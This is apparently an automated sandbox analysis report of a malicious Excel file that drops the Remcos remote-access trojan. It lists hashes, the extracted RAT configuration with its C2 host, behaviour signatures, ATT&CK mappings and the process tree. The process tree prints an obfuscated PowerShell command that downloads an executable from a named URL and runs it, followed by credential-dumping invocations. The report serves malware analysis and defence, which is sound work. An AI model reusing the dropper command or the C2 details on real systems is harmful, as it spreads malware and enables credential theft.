Analysis

  • max time kernel
    153s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    14-10-2021 08:11

General

  • Target

    ACH-01068034.xls

  • Size

    74KB

  • MD5

    61cad3efd5f03b11b513cf54c6b2122b

  • SHA1

    5b5584f7798f33d6bab0c37755f3fe62672b48f7

  • SHA256

    c0c93f169cabc35bbaac637c0dd6c21112752398c42b3c828d78d9cc4de2eaed

  • SHA512

    56b2e055a0dc3a9ba009a5c46839f8882959c024886f47b1493ba0204b25311b3e4612bf3ef44758231c6297fcd8dc5ca7aba43a347cbd2f7e793abb4a33be31

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs

  • exe.dropper

    http://greenpayindia.com/wp-conternt/ConsoleApp18.exe

Extracted

  • Family

    remcos

  • Version

    3.3.0 Pro

  • Botnet

    RemoteHost

  • C2

    lplazadtemins.duckdns.org:443

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Remcos-NLSDTO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

    notepad;solitaire;

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ACH-01068034.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:620
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\travelespecially.cmd" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:356
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://greenpayindia.com/wp-conternt/ConsoleApp18.e`xe -Destination C:\Users\Public\Documents\brotherneed.e`xe;C:\Users\Public\Documents\brotherneed.e`xe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1456
        • C:\Users\Public\Documents\brotherneed.exe
          "C:\Users\Public\Documents\brotherneed.exe"
          4⤵
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
            C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2096
            • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
              C:\Users\Admin\AppData\Local\Temp\brotherneed.exe /stext "C:\Users\Admin\AppData\Local\Temp\ovvrkyvnjcoalzkksbxdgcmapnzrymln"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:2876
            • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
              C:\Users\Admin\AppData\Local\Temp\brotherneed.exe /stext "C:\Users\Admin\AppData\Local\Temp\zpjcl"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3808
            • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
              C:\Users\Admin\AppData\Local\Temp\brotherneed.exe /stext "C:\Users\Admin\AppData\Local\Temp\broumjrj"
              6⤵
              • Executes dropped EXE
              • Accesses Microsoft Outlook accounts
              PID:944

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence

    Registry Run Keys / Startup Folder (1) T1060

  • Defense Evasion

    Modify Registry (1) T1112

  • Credential Access

    Credentials in Files (1) T1081

  • Discovery

    Query Registry (2) T1012
    System Information Discovery (2) T1082

  • Collection

    Data from Local System (1) T1005
    Email Collection (1) T1114


Downloads

  • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
    MD5

    aade455507f667318c83c42a95b3fc3c

    SHA1

    92efbfe4546ddee6a5807a5794adea2f440cf107

    SHA256

    b774d45c6788cc48716eee3e81002e5b74996a3c2610967f3d19115646ca4d6a

    SHA512

    f3a719f289a06b7bda717c56ddc4319bcd9c5f82eebe815f6923635f630f2940efa5cf8298d94117e0ef2470225deecaf3641e96b63cf47b3767a6aa5a772ffd

  • C:\Users\Admin\AppData\Local\Temp\ovvrkyvnjcoalzkksbxdgcmapnzrymln
    MD5

    97df504bfd2bd5a506e650b791508181

    SHA1

    fcbe623c69e21332ba3b657fb8e08f1a3136479d

    SHA256

    cac37437a8df8dec72c830a034dec8962357a5e41545c8cdd3e3529f3007fb6b

    SHA512

    63d93900a51ccdf51215c57527af84c0f79ffa82f1463c851e6d765f91c1a4be624190b335e46debc8a1c63bc06dec885207c92e4d44a815fdf0d42f8dd6fd81

  • C:\Users\Public\Documents\travelespecially.cmd
    MD5

    5ea928ce876726d313001f5cbd14bc65

    SHA1

    b259839789c490d08af262d9217eddf2bfa93060

    SHA256

    6c6f74c6249e442097918f128fa0680d53504fabf1f31198ed9c4d5de3364e0f

    SHA512

    f8bceb21b86176edd8a917b000edcf2c6458e175c75ca546933caada1b6f436dd1e0a269c0989b45da5a9b48821bd97bb5db86b122e922fc8ae551b860cd2421

  • memory/356-264-0x0000000000000000-mapping.dmp
  • memory/620-121-0x000002245F960000-0x000002245F962000-memory.dmp
    Filesize

    8KB

  • memory/620-117-0x00007FFF50D30000-0x00007FFF50D40000-memory.dmp
    Filesize

    64KB

  • memory/620-115-0x00007FFF50D30000-0x00007FFF50D40000-memory.dmp
    Filesize

    64KB

  • memory/620-116-0x00007FFF50D30000-0x00007FFF50D40000-memory.dmp
    Filesize

    64KB

  • memory/620-114-0x00007FFF50D30000-0x00007FFF50D40000-memory.dmp
    Filesize

    64KB

  • memory/620-118-0x00007FFF50D30000-0x00007FFF50D40000-memory.dmp
    Filesize

    64KB

  • memory/620-119-0x000002245F960000-0x000002245F962000-memory.dmp
    Filesize

    8KB

  • memory/620-120-0x000002245F960000-0x000002245F962000-memory.dmp
    Filesize

    8KB

  • memory/944-463-0x0000000000455238-mapping.dmp
  • memory/944-469-0x0000000000400000-0x0000000000457000-memory.dmp
    Filesize

    348KB

  • memory/1456-412-0x0000021DAC7E8000-0x0000021DAC7E9000-memory.dmp
    Filesize

    4KB

  • memory/1456-411-0x0000021DAC7E6000-0x0000021DAC7E8000-memory.dmp
    Filesize

    8KB

  • memory/1456-291-0x0000021DAC7E3000-0x0000021DAC7E5000-memory.dmp
    Filesize

    8KB

  • memory/1456-290-0x0000021DAC7E0000-0x0000021DAC7E2000-memory.dmp
    Filesize

    8KB

  • memory/1456-267-0x0000000000000000-mapping.dmp
  • memory/1672-419-0x0000000004EE0000-0x0000000004EE1000-memory.dmp
    Filesize

    4KB

  • memory/1672-413-0x0000000000000000-mapping.dmp
  • memory/2096-454-0x0000000000400000-0x0000000000479000-memory.dmp
    Filesize

    484KB

  • memory/2096-450-0x000000000042FC39-mapping.dmp
  • memory/2876-456-0x0000000000476274-mapping.dmp
  • memory/2876-468-0x0000000000400000-0x0000000000478000-memory.dmp
    Filesize

    480KB

  • memory/3808-459-0x0000000000422206-mapping.dmp
  • memory/3808-467-0x0000000000400000-0x0000000000424000-memory.dmp
    Filesize

    144KB